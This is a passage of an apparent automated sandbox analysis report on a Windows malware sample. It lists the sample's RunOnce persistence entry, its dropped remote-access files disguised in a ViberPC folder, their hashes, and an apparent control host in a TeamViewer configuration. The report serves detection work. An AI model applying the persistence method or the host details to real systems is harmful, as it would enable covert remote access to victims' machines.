                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483790/sample/wogZe27GBB.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      13:45:03API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                      13:45:17API Interceptor45x Sleep call for process: UniPrint.exe modified
                                                                                                      13:45:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
                                                                                                      13:45:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
                                                                                                      13:46:22API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      No context

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      No context

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4096
                                                                                                      Entropy (8bit):0.5981930978381301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:0FIEk1GaD0JOCEfMuaaD0JOCEfMKQmDctAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0kGaD0JcaaD0JwQQctAg/0bjSQJ
                                                                                                      MD5:9583F7C60F8EFC7CB04E9CFB7A705D43
                                                                                                      SHA1:72086359D312BEF7D4ECF7597594643796108F64
                                                                                                      SHA-256:04F0ECC8F9FCBFDEFD04601E9249E32B78E12E985F15059E91EF4B9DF138E4AE
                                                                                                      SHA-512:5F2D38182933C9B7AAAAE8782F93EAF39F6BFBE7549FDF7D1D9B2EA2859F60880A1217FD9E577ABE2CDB6EA1C4AA2E01F6D0FB1D9CA1C08776D1DDD5EE35D428
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ......:{..(......-...y).............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................-...y)...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcd629f4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.09602595647092171
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:lX0+pO4blOcrEU8KPX0+pO4blOcrEU8K:lE3vUfE3vU
                                                                                                      MD5:17572DB7D0DBC703232DAC6C89A6FD7F
                                                                                                      SHA1:DE7A84F48AFA0F3577751814C5CA65D2A3BB6E22
                                                                                                      SHA-256:9AC0533D9388A9CB1739476F26A9A8E8E169EFD840A136815C0C144AAEAE407A
                                                                                                      SHA-512:D0EE9AE240AE18D039E6C585F6A77B506391B47B9BFBCFB7958004D06A9E1BC862E640767272959A0948541267FA7098C3C9E1F31A6F221633828165639426CF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..).... ................e.f.3...w........................&..........w...-...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...........................................................................................................................................................................................................................................-...y.m.....................-...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.11125039857702498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:al/7EvmIsMkl/bJdAtiyUXAll:al/imIs5t4rUA
                                                                                                      MD5:5D4C153B6F12CDE3CD90442430CA538E
                                                                                                      SHA1:8EEE4570E5CFE88F9183FD76A2657FAFB4532935
                                                                                                      SHA-256:B0587864D6A961113666F0EA1592A36E5FDAB791C9186EB05C4DF5E7191CCDD0
                                                                                                      SHA-512:BE69F790037122ED95E0457206F0CE46DF9642E10E415ECEFD07813D3008E2E272D055B327F1897B6AFBB5B8E18817EA4274B6B3B39AED375DD0FD7881541F8C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..~O.....................................3...w...-...y.......w...............w.......w....:O.....w.......................-...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..........................................................................................!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....;...r...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P...........!.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........................................................................................h*.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... ........r...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........R......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: .........................................................................................g.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....I".r...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........wp......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Temp\nsaF7DF.tmp
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5131242
                                                                                                      Entropy (8bit):6.736055511669049
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:xmfzCAW6LcJjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5CjH:xmfzCgEqHuMogsRkyq0X
                                                                                                      MD5:1E6978657EEB4A9F6B4E84C62B228EE4
                                                                                                      SHA1:496A37AE9417163CFF53FBFEA9BA5BD1AC6BAFAE
                                                                                                      SHA-256:0FFB6906EA4C7B9A2E97FE0B8A205E00C8E5B1A7E03038627B1E6681CC66B986
                                                                                                      SHA-512:412332869C2B7C90A5409338EBBFF96786AEADDAA54A0BA1F0D96035E929D7DFB773A2E02F8C588F15739A3CE0211DAE6074EEFE94AE18F85B5C4FA2C6BCBC6B
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........,.......,.......D.......$.......b...................................................................................................................................................................................................................................................J...V.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.. (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ..........................................................................................!......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....;...r...........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P...........!.....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ........................................................................................h*.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... ........r...........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P..........R......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001cd (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: .........................................................................................g.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..............................................................N...... .....I".r...........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.........wp......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):73696
                                                                                                      Entropy (8bit):6.629217484187715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:DWNCi7sBIpvYqSRw6zhD16poDVDREv1Mme9MfPGz49jjZLq00RKi5jYjfLhs8WhU:A6BmmPX6mDVdme9uGzWH10I+Uje8WhU
                                                                                                      MD5:AC34AB95CBC23CDF332BEA2CC0FFBF35
                                                                                                      SHA1:43ED3DD9863791294064D2F85F3DF3F08D572037
                                                                                                      SHA-256:4BA3BD623A9919A357708DA57BBBBC978706DAD8D57DA64E89C780147843C7CE
                                                                                                      SHA-512:3740DFD9F8ED967953C6A3522D66B5E547D3BB2A4C618FD667A817F6283E4353E2B81E994938E989AEA89BFD7A23E41309647EDCD1F6F0A075436E5B1FEE7B0A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.@....................../...........................................................Rich....................PE..L...QQ.a...........!.........L............................................... ......-s....@.........................`...D.......,...................................0...................................................0............................text............................... ..`.rdata...,..........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
                                                                                                      Process:C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):2686
                                                                                                      Entropy (8bit):3.08315222410398
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Eo+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+J:4
                                                                                                      MD5:2EC23B404939C7DD6574832D486A52A4
                                                                                                      SHA1:0F29DBB69ECDFC319C36D354E673B0C2108155DA
                                                                                                      SHA-256:4B76AA0920E1C1F44F69AF968390128D41C5E0BBD8690B86FC5FBA8FAE9980BB
                                                                                                      SHA-512:97E4EA5179D8B175BFDCA1A1FFA74288403F0C3DA85ECD74F7B328471130C98EC53010A489EE72A871611B4BF5B37D47229FC34BFACB919A15D4B36705F6FC30
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: h.d.n.=.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):607528
                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4375848
                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\vpn.cab
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                      Category:dropped
                                                                                                      Size (bytes):71196
                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):906
                                                                                                      Entropy (8bit):3.148609195269616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:58KRBubdpkoF1AG3rlsQlw3IH5k9+MlWlLehB4yAq7ejCEsQlw3IHI:OaqdmuF3rlp+F+kWReH4yJ7MNp+f
                                                                                                      MD5:ADC0A8B01369CAC8EB3BF72C06D5D1C2
                                                                                                      SHA1:E3F79ECF0CCC2F022F9264DBF28268FF2F18157F
                                                                                                      SHA-256:FC5F3AA59658229CEB400FD3D707B0977E947F5DD13862044ABCCEEA1BB416D5
                                                                                                      SHA-512:F0BC86DE276547D63DD085C2E37F4A33BFC58E874F077CC6A910F83455EF36B18E367B0B9C170F5D10AC3EFE439E070451E4367B03BB86384EA9191C5DBDC15D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
